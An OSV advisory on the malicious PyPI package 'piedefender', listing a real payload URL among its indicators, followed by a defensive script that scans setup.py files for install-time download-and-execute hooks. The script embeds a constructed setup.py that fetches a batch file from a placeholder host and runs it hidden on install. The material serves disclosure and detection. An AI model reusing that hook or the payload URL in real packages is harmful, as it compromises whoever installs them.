{"id":"MAL-2025-3454","summary":"Malicious code in piedefender (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: kam193 (f8a30e991bd97073c50a9cdabb10842f2c5ae074c46fcd0aeff5d7917d4b56fa)\nsetup.py is prepared to download and run an obfuscated batch script. While the script is not detected by any AV currently, in the sandbox analysis it reveals behaviour like adding exclusions to Windows Defender\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2025-02-pydefender\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote malicious script.\n\n\n - malware\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n","modified":"2026-03-19T12:55:21.819925Z","published":"2025-03-01T15:16:30Z","database_specific":{"iocs":{"urls":["https://raw.githubusercontent.com/baledreamer/payload/refs/heads/main/smegma.bat"]},"malicious-packages-origins":[{"sha256":"b13c9da5083fadd88be010b9dd1c0f2e3cb5cec7f1ff9a33d8f5f824c3182e1e","versions":["0.0.1"],"id":"RLMA-2025-02517","import_time":"2025-04-25T09:36:47.086298036Z","source":"reversing-labs","modified_time":"2025-04-23T16:06:31Z"},{"ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-02T22:30:55.427439345Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z","sha256":"2c1529cc05836ad53ce1822ee0e8da4790aa1ce9d219d1b00e70ced2cb8798fe"},{"ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-02T23:07:18.453273245Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z","sha256":"f8a30e991bd97073c50a9cdabb10842f2c5ae074c46fcd0aeff5d7917d4b56fa"},{"sha256":"2903ec35712e2f200e617905786798d33c5fde00c0334c5694257c81e6b9f066","versions":["0.0.1"],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-10T21:38:57.668560408Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z"},{"sha256":"9eac6fdd9b544e93e1b48694e0ffad9d309d5a7d03f1c87eb4b806af6e9e2141","id":"RLUA-2026-00591","import_time":"2026-03-19T12:20:12.093951523Z","source":"reversing-labs","modified_time":"2026-03-18T12:16:55Z"}]},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0877653f6a24639bb02b547c94f670597c3c0cd96df910a2ac891eaeaa9cc5f3/behavior"},{"type":"EVIDENCE","url":"https://tria.ge/250301-sdh1pstrz7/behavioral1"},{"type":"EVIDENCE","url":"https://app.any.run/tasks/0fbdb4f9-0497-4272-baf0-872e8d6e50bc"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/piedefender"}],"affected":[{"package":{"name":"piedefender","ecosystem":"PyPI","purl":"pkg:pypi/piedefender"},"versions":["0.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/piedefender/MAL-2025-3454.json"}}],"schema_version":"1.7.5","credits":[{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"]},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"},{"name":"ReversingLabs","contact":["https://www.reversinglabs.com"],"type":"FINDER"}]}
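The advisory's reasons list describes the technique only in one line each: the package overrides the setuptools install command in setup.py and uses that hook to download and execute a remote script. The following is an added example, not code from the advisory, from kam193's scanner, or from the piedefender package itself. It is a static triage pass over a setup.py using Python's ast module that flags the indicators a reviewer would look for before letting pip run the file: a cmdclass override of an install-time command, a class subclassing one of those commands, a remote fetch call, a process-execution call, decoding or dynamic-exec calls, and string literals that are URLs to script files. Import aliases are resolved so that `import subprocess as sp` or `from urllib.request import urlopen` cannot hide the call. The two setup.py samples embedded below are constructed for this example (the placeholder URL on example.invalid is not the real IOC); the real package's source is not reproduced here.

```python
# Added example, not code from the advisory or from the piedefender package.
# Static triage of a setup.py for the pattern the advisory describes: a
# setuptools install command override that fetches and runs a remote script.
# Both setup.py samples below are constructed for illustration (the URL is a
# placeholder); the real package's source is not reproduced here.
import ast
from typing import Dict, List, Set

# setuptools commands that pip runs during installation
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py", "bdist_egg"}
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "requests.post", "urllib.urlopen"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen", "os.startfile"}
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress", "exec", "eval"}
SCRIPT_EXTS = (".bat", ".cmd", ".ps1", ".vbs", ".exe")


def _dotted(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from an Attribute/Name chain; '' if it is not one."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(node.id)
    return ".".join(reversed(parts))


def _import_map(tree: ast.Module) -> Dict[str, str]:
    """Map local names to qualified names so aliases cannot hide a call."""
    names: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:                 # import subprocess as sp
                names[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                 # from urllib.request import urlopen
                names[a.asname or a.name] = f"{node.module}.{a.name}"
    return names


def _resolve(call: ast.Call, imports: Dict[str, str]) -> str:
    """Qualified name of a call target with import aliases expanded."""
    dotted = _dotted(call.func)
    head, _, rest = dotted.partition(".")
    head = imports.get(head, head)
    return f"{head}.{rest}" if rest else head


def triage_setup_py(source: str) -> List[str]:
    """Return sorted findings for install-time download-and-execute indicators."""
    tree = ast.parse(source)
    imports = _import_map(tree)
    findings: Set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):       # class PostInstall(install)
            for base in node.bases:
                name = _dotted(base).rsplit(".", 1)[-1]
                if name in INSTALL_HOOKS:
                    findings.add(f"class {node.name} subclasses setuptools command '{name}'")
        elif isinstance(node, ast.Call):
            target = _resolve(node, imports)
            if target.endswith("setup"):         # setup(cmdclass={"install": ...})
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        for key in kw.value.keys:
                            if isinstance(key, ast.Constant) and key.value in INSTALL_HOOKS:
                                findings.add(f"cmdclass overrides '{key.value}' command")
            if target in FETCH_CALLS:
                findings.add(f"remote fetch: {target}")
            if target in EXEC_CALLS:
                findings.add(f"process execution: {target}")
            if target in DECODE_CALLS:
                findings.add(f"payload decoding or dynamic execution: {target}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = node.value.lower()
            if url.startswith(("http://", "https://")) and url.endswith(SCRIPT_EXTS):
                findings.add(f"URL to executable script: {node.value}")
    return sorted(findings)


# Constructed sample: an ordinary setup.py with no install-time hooks.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example", version="1.0", packages=find_packages())
'''

# Constructed sample mirroring the advisory's pattern; placeholder URL, not the real IOC.
SUSPICIOUS_SETUP = '''
import os, subprocess, tempfile
from urllib.request import urlopen
from setuptools import setup
from setuptools.command.install import install

PAYLOAD = "https://example.invalid/payload/stage1.bat"

class PostInstall(install):
    def run(self):
        install.run(self)
        data = urlopen(PAYLOAD).read()
        path = os.path.join(tempfile.gettempdir(), "s.bat")
        open(path, "wb").write(data)
        subprocess.Popen(["cmd", "/c", path], creationflags=0x08000000)

setup(name="example", version="0.0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, triage_setup_py(src))
```

Run it over the setup.py extracted from a downloaded sdist (`pip download --no-deps --no-binary :all: <pkg>`) before installing; a cmdclass override combined with a fetch and an exec call is the combination that warrants a sandbox run. This is a first-pass heuristic only: the advisory notes that the downloaded batch script was itself obfuscated and undetected by AV at the time, so behavioural analysis such as the linked sandbox reports remains necessary, and setup.py that builds its calls from strings or `getattr` will slip past a syntactic check like this one.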